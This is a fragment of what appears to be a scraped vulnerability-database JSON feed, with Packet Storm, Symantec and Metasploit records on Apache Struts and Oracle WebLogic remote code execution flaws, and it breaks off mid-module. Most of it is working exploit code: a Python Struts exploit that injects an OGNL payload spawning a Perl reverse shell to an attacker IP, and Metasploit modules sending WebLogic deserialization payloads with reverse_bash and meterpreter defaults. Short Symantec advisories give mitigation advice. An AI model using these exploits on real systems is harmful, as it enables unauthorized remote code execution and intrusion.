%q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, p_target, p_ip, p_port): \nself.target = p_target \nself.ip = p_ip \nself.port = p_port \nself.revshell = self.generate_revshell() \nself.payload = self.generate_payload() \nself.exploit() \n \ndef generate_revshell(self): \nrevshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\ \n\"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\ \n\"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\ \n\"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\ \n\"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\" \nreturn revshell.format(self.ip, self.port) \n \ndef generate_payload(self): \npayload = \"%{{(#_='multipart/form-data').\"\\ \n\"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\"\\ \n\"(#_memberAccess?\"\\ \n\"(#_memberAccess=#dm):\"\\ \n\"((#container=#context['com.opensymphony.xwork2.\"\\ \n\"ActionContext.container']).\"\\ \n\"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\ \n\"xwork2.ognl.OgnlUtil@class)).\"\\ \n\"(#ognlUtil.getExcludedPackageNames().clear()).\"\\ \n\"(#ognlUtil.getExcludedClasses().clear()).\"\\ \n\"(#context.setMemberAccess(#dm)))).\"\\ \n\"(#cmd='{0}').\"\\ \n\"(#iswin=(@java.lang.System@getProperty('os.name').\"\\ \n\"toLowerCase().contains('win'))).\"\\ \n\"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\ \n\"{{'/bin/bash','-c',#cmd}})).\"\\ \n\"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\ \n\"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\ \n\"(#ros=(@org.apache.struts2.ServletActionContext@get\"\\ \n\"Response().getOutputStream())).\"\\ \n\"(@org.apache.commons.io.IOUtils@copy\"\\ \n\"(#process.getInputStream(),#ros)).(#ros.flush())}}\" \nreturn payload.format(self.revshell) \n \ndef exploit(self): \ntry: \n# Set proxy for debug request, just uncomment these lines \n# Change the proxy port \n \n#proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'}) \n#opener = urllib2.build_opener(proxy) \n#urllib2.install_opener(opener) \n \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)' \n' AppleWebKit/537.36 (KHTML, like Gecko)' \n' Chrome/55.0.2883.87 Safari/537.36', \n'Content-Type': self.payload} \nxpl = urllib2.Request(self.target, headers=headers) \nbody = urllib2.urlopen(xpl).read() \nexcept httplib.IncompleteRead as b: \nbody = b.partial \nprint body \n \n \ndef main(): \ntry: \narguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\") \ntarget = arguments['--target'] \nip = arguments['--ip'] \nport = arguments['--port'] \nexcept DocoptExit as e: \nos.system('python struntsrce.py --help') \nsys.exit(1) \n \nCVE_2017_5638(target, ip, port) \n \n \nif __name__ == '__main__': \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141576/struntsrce.py.txt"}, {"lastseen": "2019-05-08T03:35:49", "description": "", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-07T00:00:00", "id": "PACKETSTORM:152756", "href": "https://packetstormsecurity.com/files/152756/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic Server T3 \ninterface can send a malicious SOAP request to the interface WLS AsyncResponseService \nto execute code on the vulnerable host. \n}, \n'Author' => \n[ \n'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-2725'], \n['CNVD-C', '2019-48814'], \n['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'], \n['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'] \n], \n'Privileged' => false, \n'Platform' => %w{ unix win solaris }, \n'Targets' => \n[ \n[ 'Unix', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} \n], \n[ 'Windows', \n'Platform' => 'win', \n'Arch' => [ARCH_X64, ARCH_X86], \n'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} \n], \n[ 'Solaris', \n'Platform' => 'solaris', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, \n'Payload' => { \n'Space' => 2048, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'WfsDelay' => 12 \n}, \n'DisclosureDate' => 'Apr 23 2019')) \n \nregister_options( \n[ \nOpt::RPORT(7001), \nOptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]), \nOptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService']) \n] \n) \nend \n \ndef check \nres = send_request_cgi( \n'uri' => normalize_uri(datastore['WSPATH']), \n'method' => 'POST', \n'ctype' => 'text/xml', \n'headers' => {'SOAPAction' => '' } \n) \n \nif res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\") \nvprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\") \nvprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\") \nExploit::CheckCode::Vulnerable \nelsif res && res.code != 202 \nvprint_status(\"The target returned a non-vulnerable HTTP code\") \nExploit::CheckCode::Safe \nelsif res.nil? \nvprint_status(\"The target did not respond in an expected way\") \nExploit::CheckCode::Unknown \nelse \nvprint_status(\"The target returned HTTP code: #{res.code}\") \nvprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\") \nExploit::CheckCode::Unknown \nend \nend \n \ndef exploit \nprint_status(\"Generating payload...\") \ncase target.name \nwhen 'Windows' \nstring0_cmd = 'cmd.exe' \nstring1_param = '/c' \nshell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false }) \nwhen 'Unix','Solaris' \nstring0_cmd = '/bin/bash' \nstring1_param = '-c' \nshell_payload = payload.encoded \nend \n \nrandom_action = rand_text_alphanumeric(20) \nrandom_relates = rand_text_alphanumeric(20) \n \nsoap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"| \nsoap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"| \nsoap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">| \nsoap_payload << %Q|<soapenv:Header>| \nsoap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>| \nsoap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>| \nsoap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">| \nsoap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">| \nsoap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">| \nsoap_payload << %Q|<void index=\"0\">| \nsoap_payload << %Q|<string>#{string0_cmd}</string>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|<void index=\"1\">| \nsoap_payload << %Q|<string>#{string1_param}</string>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|<void index=\"2\">| \nsoap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>| \n#soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|</array>| \nsoap_payload << %Q|<void method=\"start\"/>| \nsoap_payload << %Q|</void>| \nsoap_payload << %Q|</work:WorkContext>| \nsoap_payload << %Q|</soapenv:Header>| \nsoap_payload << %Q|<soapenv:Body>| \nsoap_payload << %Q|<asy:onAsyncDelivery/>| \nsoap_payload << %Q|</soapenv:Body>| \nsoap_payload << %Q|</soapenv:Envelope>| \n \nuri = normalize_uri(datastore['WSPATH']) \nif uri.nil? \ndatastore['URIPATH'] = \"http://#{RHOST}:#{RPORT}/\" \nend \n \nprint_status(\"Sending payload...\") \n \nbegin \nres = send_request_cgi( \n'uri' => uri, \n'method' => 'POST', \n'ctype' => 'text/xml', \n'data' => soap_payload, \n'headers' => {'SOAPAction' => '' } \n) \nrescue Errno::ENOTCONN \nfail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\") \nend \n \nif res.nil? \nfail_with(Failure::Unreachable, \"No response from host\") \nelsif res && res.code != 202 \nfail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\") \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152756/weblogic_deserialize_asyncresponseservice.rb.txt"}], "symantec": [{"lastseen": "2021-06-08T19:08:30", "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-10-17T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-01-15T20:35:57", "description": "### Description\n\nOracle WebLogic Server is prone to a remote code-execution vulnerability. A remote attacker can leverage this issue to execute arbitrary code within the context of the affected system. Failed exploit attempts may result in a denial-of-service condition. Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0 are vulnerable.\n\n### Technologies Affected\n\n * Oracle Communications Converged Application Server 5.1 \n * Oracle Communications Converged Application Server 7.0 \n * Oracle Communications Converged Application Server 7.1 \n * Oracle PeopleSoft Enterprise PeopleTools 8.56 \n * Oracle PeopleSoft Enterprise PeopleTools 8.57 \n * Oracle PeopleSoft Enterprise PeopleTools 8.58 \n * Oracle StorageTek Tape Analytics SW Tool 2.3.0 \n * Oracle Tape Library ACSLS 8.5 \n * Oracle Weblogic Server 10.3.6.0.0 \n * Oracle Weblogic Server 12.1.3.0.0 \n * Oracle Weblogic Server 12.2.1.3.0 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-06-18T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server Deserialization CVE-2019-2729 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-06-18T00:00:00", "id": "SMNTC-108822", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/108822", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-03-23T01:32:13", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-13T16:31:03", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.\n", "cvss3": {}, "published": "2019-04-26T01:03:17", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2023-04-04T09:27:11", "id": "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' => [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2019-2725'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],\n ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']\n ],\n 'Privileged' => false,\n 'Platform' => %w[unix win solaris],\n 'Targets' => [\n [\n 'Unix',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Solaris',\n {\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => '2019-04-23',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => { 'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status('The target returned a non-vulnerable HTTP code')\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status('The target did not respond in an expected way')\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status('Generating payload...')\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })\n when 'Unix', 'Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %(<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\")\n soap_payload << %(xmlns:wsa=\"http://www.w3.org/2005/08/addressing\")\n soap_payload << %(xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">)\n soap_payload << %(<soapenv:Header>)\n soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)\n soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)\n soap_payload << %(<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">)\n soap_payload << %(<void class=\"java.lang.ProcessBuilder\">)\n soap_payload << %(<array class=\"java.lang.String\" length=\"3\">)\n soap_payload << %(<void index=\"0\">)\n soap_payload << %(<string>#{string0_cmd}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"1\">)\n soap_payload << %(<string>#{string1_param}</string>)\n soap_payload << %(</void>)\n soap_payload << %(<void index=\"2\">)\n soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)\n # soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %(</void>)\n soap_payload << %(</array>)\n soap_payload << %(<void method=\"start\"/>)\n soap_payload << %(</void>)\n soap_payload << %(</work:WorkContext>)\n soap_payload << %(</soapenv:Header>)\n soap_payload << %(<soapenv:Body>)\n soap_payload << %(<asy:onAsyncDelivery/>)\n soap_payload << %(</soapenv:Body>)\n soap_payload << %(</soapenv:Envelope>)\n\n print_status('Sending payload...')\n\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'ctype' 